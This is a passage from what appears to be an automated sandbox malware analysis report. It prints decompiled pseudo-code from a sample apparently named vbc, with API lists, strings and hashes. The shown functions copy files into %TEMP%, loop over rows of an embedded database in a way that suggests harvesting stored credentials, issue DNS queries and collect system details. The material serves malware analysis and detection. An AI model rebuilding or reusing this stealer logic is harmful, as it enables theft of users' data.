				intOrPtr* _t100;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t149;
				void* _t155;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t185;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t191;
				void* _t192;

				_t187 = __esi;
				_t154 = __ebx;
				_t57 = __eax | 0x5500000a;
				_t189 = _t190;
				_t155 = 9;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
					_t195 = _t155;
				} while (_t155 != 0);
				_push(_t155);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t57;
				E004040F4( &_v8);
				_push(_t189);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00403B80( &_v28);
				_push(_t189);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t154,  &_v40, _t195);
				E004062D8(L"%TEMP%",  &_v60, _t195);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t154,  &_v44, _t195);
				_t77 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t154, _t155) != 0) {
					_t92 =  *0x41b55c; // 0x41c784
					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
					_t191 = _t190 + 8;
					__eflags = _t94;
					if(_t94 == 0) {
						E00408120(0x65,  &_v72);
						_t133 =  *0x41b5cc; // 0x41c78c
						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t192 = _t191 + 0x14;
						__eflags = _t135;
						if(_t135 == 0) {
							while(1) {
								_t137 =  *0x41b600; // 0x41c790
								_t139 =  *((intOrPtr*)( *_t137))(_v20);
								__eflags = _t139 - 0x64;
								if(_t139 != 0x64) {
									goto L10;
								}
								_t141 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
								_t147 =  *0x41b588; // 0x41c794
								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
								_t192 = _t192 + 0x10;
								E00403C98( &_v80, _t149);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L10:
					_t96 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t96))(_v20);
					_t100 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t100))(_v16);
					_pop(_t175);
					 *[fs:eax] = _t175;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t185);
					 *[fs:eax] = _t185;
				}
				_pop(_t177);
				 *[fs:eax] = _t177;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}











































                                                                                                    0x00410bb4
                                                                                                    0x00410bb4
                                                                                                    0x00410bb4
                                                                                                    0x00410bb9
                                                                                                    0x00410bbb
                                                                                                    0x00410bc0
                                                                                                    0x00410bc0
                                                                                                    0x00410bc2
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc7
                                                                                                    0x00410bc8
                                                                                                    0x00410bc9
                                                                                                    0x00410bca
                                                                                                    0x00410bcb
                                                                                                    0x00410bce
                                                                                                    0x00410bd4
                                                                                                    0x00410bdb
                                                                                                    0x00410bdc
                                                                                                    0x00410be1
                                                                                                    0x00410be4
                                                                                                    0x00410bea
                                                                                                    0x00410bf1
                                                                                                    0x00410bf2
                                                                                                    0x00410bf7
                                                                                                    0x00410bfa
                                                                                                    0x00410c05
                                                                                                    0x00410c0a
                                                                                                    0x00410c10
                                                                                                    0x00410c15
                                                                                                    0x00410c18
                                                                                                    0x00410c25
                                                                                                    0x00410c30
                                                                                                    0x00410c3d
                                                                                                    0x00410c42
                                                                                                    0x00410c45
                                                                                                    0x00410c4a
                                                                                                    0x00410c55
                                                                                                    0x00410c60
                                                                                                    0x00410c6a
                                                                                                    0x00410c79
                                                                                                    0x00410c84
                                                                                                    0x00410c8f
                                                                                                    0x00410c9a
                                                                                                    0x00410ca9
                                                                                                    0x00410cc5
                                                                                                    0x00410ccc
                                                                                                    0x00410cce
                                                                                                    0x00410cd1
                                                                                                    0x00410cd3
                                                                                                    0x00410ceb
                                                                                                    0x00410cfd
                                                                                                    0x00410d04
                                                                                                    0x00410d06
                                                                                                    0x00410d09
                                                                                                    0x00410d0b
                                                                                                    0x00410d67
                                                                                                    0x00410d6b
                                                                                                    0x00410d72
                                                                                                    0x00410d75
                                                                                                    0x00410d78
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410d18
                                                                                                    0x00410d29
                                                                                                    0x00410d3c
                                                                                                    0x00410d43
                                                                                                    0x00410d45
                                                                                                    0x00410d4d
                                                                                                    0x00410d52
                                                                                                    0x00410d55
                                                                                                    0x00410d62
                                                                                                    0x00410d62
                                                                                                    0x00410d67
                                                                                                    0x00410d0b
                                                                                                    0x00410d7a
                                                                                                    0x00410d7e
                                                                                                    0x00410d85
                                                                                                    0x00410d8c
                                                                                                    0x00410d93
                                                                                                    0x00410d98
                                                                                                    0x00410d9b
                                                                                                    0x00410db0
                                                                                                    0x00410dbe
                                                                                                    0x00410cab
                                                                                                    0x00410cad
                                                                                                    0x00410cb0
                                                                                                    0x00410cb0
                                                                                                    0x00410dc5
                                                                                                    0x00410dc8
                                                                                                    0x00410dcb
                                                                                                    0x00410dd8
                                                                                                    0x00410de0
                                                                                                    0x00410de8
                                                                                                    0x00410df0
                                                                                                    0x00410dfd
                                                                                                    0x00410e05
                                                                                                    0x00410e12
                                                                                                    0x00410e1f

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,00410DA0,?,00000000,00410E20,?,00000000,0041B0FC,00000000,00000008,00000000,00000000,?,00411311,?,0041156C), ref: 00410BFD
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410C79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CopyCountFileTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 3448371392-3650661790
                                                                                                    • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                    • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                                                    • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                    • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 69%
                                                                                                    			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t29;
				void* _t40;
				WCHAR* _t51;
				int _t54;
				void* _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t73;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t59 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t77);
				_push(0x40deaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_t29 = E00403790(_v16);
				asm("cdq");
				_t78 = _t63 -  *0x41c82c; // 0x0
				if(_t78 != 0) {
					if(__eflags < 0) {
						goto L4;
					}
				} else {
					_t79 = _t29 -  *0x41c828; // 0x5000000
					if(_t79 < 0) {
						L4:
						E00407168(_v8, _t59,  &_v16);
						_t40 = E00403790(_v16);
						_t80 = _t40;
						if(_t40 == 0) {
							_t9 =  &_v20; // 0x414c4c
							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
							_t10 =  &_v20; // 0x414c4c
							_t51 = E00403D3C( *_t10);
							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
							_t81 = _t54;
							if(_t54 != 0) {
								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
								E00407168(_v24, _t59,  &_v16);
							}
						}
						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
						DeleteFileW(E00403D3C(_v28));
					}
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0040DEB6);
				E00403B98( &_v28, 3);
				E00403508( &_v16, 2);
				return E00403B80( &_v8);
			}





















                                                                                                    0x0040ddb0
                                                                                                    0x0040ddb0
                                                                                                    0x0040ddb0
                                                                                                    0x0040ddb0
                                                                                                    0x0040ddb5
                                                                                                    0x0040ddb6
                                                                                                    0x0040ddb7
                                                                                                    0x0040ddb8
                                                                                                    0x0040ddb9
                                                                                                    0x0040ddba
                                                                                                    0x0040ddbb
                                                                                                    0x0040ddbe
                                                                                                    0x0040ddc4
                                                                                                    0x0040ddcc
                                                                                                    0x0040ddd3
                                                                                                    0x0040ddd4
                                                                                                    0x0040ddd9
                                                                                                    0x0040dddc
                                                                                                    0x0040dde2
                                                                                                    0x0040dde7
                                                                                                    0x0040dde8
                                                                                                    0x0040ddee
                                                                                                    0x0040ddfe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ddf0
                                                                                                    0x0040ddf0
                                                                                                    0x0040ddf6
                                                                                                    0x0040de00
                                                                                                    0x0040de06
                                                                                                    0x0040de0e
                                                                                                    0x0040de13
                                                                                                    0x0040de15
                                                                                                    0x0040de19
                                                                                                    0x0040de21
                                                                                                    0x0040de26
                                                                                                    0x0040de29
                                                                                                    0x0040de38
                                                                                                    0x0040de3d
                                                                                                    0x0040de3f
                                                                                                    0x0040de49
                                                                                                    0x0040de54
                                                                                                    0x0040de54
                                                                                                    0x0040de3f
                                                                                                    0x0040de5f
                                                                                                    0x0040de6c
                                                                                                    0x0040de7a
                                                                                                    0x0040de7a
                                                                                                    0x0040ddf6
                                                                                                    0x0040de81
                                                                                                    0x0040de84
                                                                                                    0x0040de87
                                                                                                    0x0040de94
                                                                                                    0x0040dea1
                                                                                                    0x0040deae

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040DE38
                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocCopyDeleteString
                                                                                                    • String ID: %TEMP%\curbuf.dat$LLA
                                                                                                    • API String ID: 5292005-3909751444
                                                                                                    • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                    • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                                                    • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                    • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040246C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E0040246C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t47;

				_t45 = _t47;
				_t42 = __edx;
				_t25 = __eax;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t45);
					_push("�^");
					_push( *[fs:edx]);
					 *[fs:edx] = _t47;
					if( *0x41c035 != 0) {
						_push("(.M");
						L004011CC();
					}
					if(E00402290(_t25, _t42) == 0) {
						_t39 = E00401F5C(_t42);
						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
							_t15 = _t42;
						}
						if(_t39 != 0) {
							E00402628(_t25, _t15, _t39);
							E004020EC(_t25);
						}
						_v8 = _t39;
					} else {
						_v8 = _t25;
					}
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E00402524);
					if( *0x41c035 != 0) {
						_push("(.M");
						L004011D4();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}












                                                                                                    0x0040246d
                                                                                                    0x00402473
                                                                                                    0x00402475
                                                                                                    0x0040247e
                                                                                                    0x00402495
                                                                                                    0x00402496
                                                                                                    0x0040249b
                                                                                                    0x0040249e
                                                                                                    0x004024a8
                                                                                                    0x004024aa
                                                                                                    0x004024af
                                                                                                    0x004024af
                                                                                                    0x004024bf
                                                                                                    0x004024cd
                                                                                                    0x004024db
                                                                                                    0x004024e0
                                                                                                    0x004024e2
                                                                                                    0x004024e2
                                                                                                    0x004024e6
                                                                                                    0x004024ed
                                                                                                    0x004024f4
                                                                                                    0x004024f4
                                                                                                    0x004024f9
                                                                                                    0x004024c1
                                                                                                    0x004024c1
                                                                                                    0x004024c1
                                                                                                    0x004024fe
                                                                                                    0x00402501
                                                                                                    0x00402504
                                                                                                    0x00402510
                                                                                                    0x00402512
                                                                                                    0x00402517
                                                                                                    0x00000000
                                                                                                    0x00402517
                                                                                                    0x0040251c
                                                                                                    0x00402489
                                                                                                    0x0040248b
                                                                                                    0x0040252c
                                                                                                    0x0040252c

                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32((.M,00000000,^), ref: 004024AF
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,00402524), ref: 00402517
                                                                                                      • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32((.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                      • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32((.M,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                      • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                      • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32((.M,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                    • String ID: (.M$^
                                                                                                    • API String ID: 2227675388-1824779693
                                                                                                    • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                    • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                    • Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                    • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 36%
                                                                                                    			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				void* _t16;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t49;

				_t16 = __eax +  *__eax;
				 *_t16 =  *_t16 + _t16;
				 *[cs:eax] =  *[cs:eax] + _t16;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = _t16;
				E00403980(_v8);
				_push(_t49);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff4;
				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t46 != 0) {
					_v16 = 0;
					_t37 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t37 = 1;
					 *((intOrPtr*)(_t37 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t37);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t46() == 0) {
					}
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00417F29);
				return E004034E4( &_v8);
			}












                                                                                                    0x00417e78
                                                                                                    0x00417e7a
                                                                                                    0x00417e7c
                                                                                                    0x00417e7f
                                                                                                    0x00417e89
                                                                                                    0x00417e8c
                                                                                                    0x00417e92
                                                                                                    0x00417e99
                                                                                                    0x00417e9a
                                                                                                    0x00417e9f
                                                                                                    0x00417ea2
                                                                                                    0x00417ebc
                                                                                                    0x00417ec0
                                                                                                    0x00417ec4
                                                                                                    0x00417ed1
                                                                                                    0x00417edd
                                                                                                    0x00417ee0
                                                                                                    0x00417ee9
                                                                                                    0x00417eec
                                                                                                    0x00417ef1
                                                                                                    0x00417ef2
                                                                                                    0x00417ef3
                                                                                                    0x00417ef5
                                                                                                    0x00417eff
                                                                                                    0x00417f04
                                                                                                    0x00417f04
                                                                                                    0x00417f04
                                                                                                    0x00417f0e
                                                                                                    0x00417f11
                                                                                                    0x00417f14
                                                                                                    0x00417f21

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(dnsapi.dll), ref: 00417EB1
                                                                                                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: DnsQuery_A$dnsapi.dll
                                                                                                    • API String ID: 2574300362-3847274415
                                                                                                    • Opcode ID: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
                                                                                                    • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                                                    • Opcode Fuzzy Hash: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
                                                                                                    • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 33%
                                                                                                    			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				intOrPtr* _t36;
				intOrPtr _t40;
				intOrPtr* _t45;
				void* _t48;

				 *[cs:eax] =  *[cs:eax] + __eax;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t48);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xfffffff4;
				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t45 != 0) {
					_v16 = 0;
					_t36 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t36 = 1;
					 *((intOrPtr*)(_t36 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t36);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t45() == 0) {
					}
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00417F29);
				return E004034E4( &_v8);
			}











                                                                                                    0x00417e7c
                                                                                                    0x00417e7f
                                                                                                    0x00417e89
                                                                                                    0x00417e8c
                                                                                                    0x00417e92
                                                                                                    0x00417e99
                                                                                                    0x00417e9a
                                                                                                    0x00417e9f
                                                                                                    0x00417ea2
                                                                                                    0x00417ebc
                                                                                                    0x00417ec0
                                                                                                    0x00417ec4
                                                                                                    0x00417ed1
                                                                                                    0x00417edd
                                                                                                    0x00417ee0
                                                                                                    0x00417ee9
                                                                                                    0x00417eec
                                                                                                    0x00417ef1
                                                                                                    0x00417ef2
                                                                                                    0x00417ef3
                                                                                                    0x00417ef5
                                                                                                    0x00417eff
                                                                                                    0x00417f04
                                                                                                    0x00417f04
                                                                                                    0x00417f04
                                                                                                    0x00417f0e
                                                                                                    0x00417f11
                                                                                                    0x00417f14
                                                                                                    0x00417f21

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(dnsapi.dll), ref: 00417EB1
                                                                                                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: DnsQuery_A$dnsapi.dll
                                                                                                    • API String ID: 2574300362-3847274415
                                                                                                    • Opcode ID: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
                                                                                                    • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                                                    • Opcode Fuzzy Hash: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
                                                                                                    • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 32%
                                                                                                    			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v268;
				char _v336;
				char _v340;
				char _v344;
				void* _t31;
				intOrPtr _t39;
				intOrPtr* _t43;
				void* _t46;

				_v340 = 0;
				_v344 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0x41670d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffeac;
				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
				_v336 = 0x148;
				_t31 = 0;
				while(1) {
					_push(0);
					_push( &_v336);
					_push(_t31);
					_push(0);
					if(_v8() == 0) {
						break;
					}
					_t31 = _t31 + 1;
					_push( *_t43);
					E00403D10( &_v344, 0x80,  &_v268);
					E0040377C( &_v340, _v344);
					_push(_v340);
					_push(E00416744);
					E00403850();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00416714);
				E00403B80( &_v344);
				return E004034E4( &_v340);
			}












                                                                                                    0x00416652
                                                                                                    0x00416658
                                                                                                    0x0041665e
                                                                                                    0x00416662
                                                                                                    0x00416663
                                                                                                    0x00416668
                                                                                                    0x0041666b
                                                                                                    0x00416683
                                                                                                    0x00416686
                                                                                                    0x00416692
                                                                                                    0x004166d7
                                                                                                    0x004166d7
                                                                                                    0x004166de
                                                                                                    0x004166df
                                                                                                    0x004166e0
                                                                                                    0x004166e7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00416696
                                                                                                    0x00416697
                                                                                                    0x004166aa
                                                                                                    0x004166bb
                                                                                                    0x004166c0
                                                                                                    0x004166c6
                                                                                                    0x004166d2
                                                                                                    0x004166d2
                                                                                                    0x004166eb
                                                                                                    0x004166ee
                                                                                                    0x004166f1
                                                                                                    0x004166fc
                                                                                                    0x0041670c

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 00416678
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ), ref: 0041667E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                    • API String ID: 2574300362-1693391355
                                                                                                    • Opcode ID: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
                                                                                                    • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                                                    • Opcode Fuzzy Hash: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
                                                                                                    • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 29%
                                                                                                    			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t43;
				void* _t46;

				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t46);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t43 != 0) {
					_v16 = 0;
					_t34 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t34 = 1;
					 *((intOrPtr*)(_t34 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t34);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t43() == 0) {
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00417F29);
				return E004034E4( &_v8);
			}










                                                                                                    0x00417e89
                                                                                                    0x00417e8c
                                                                                                    0x00417e92
                                                                                                    0x00417e99
                                                                                                    0x00417e9a
                                                                                                    0x00417e9f
                                                                                                    0x00417ea2
                                                                                                    0x00417ebc
                                                                                                    0x00417ec0
                                                                                                    0x00417ec4
                                                                                                    0x00417ed1
                                                                                                    0x00417edd
                                                                                                    0x00417ee0
                                                                                                    0x00417ee9
                                                                                                    0x00417eec
                                                                                                    0x00417ef1
                                                                                                    0x00417ef2
                                                                                                    0x00417ef3
                                                                                                    0x00417ef5
                                                                                                    0x00417eff
                                                                                                    0x00417f04
                                                                                                    0x00417f04
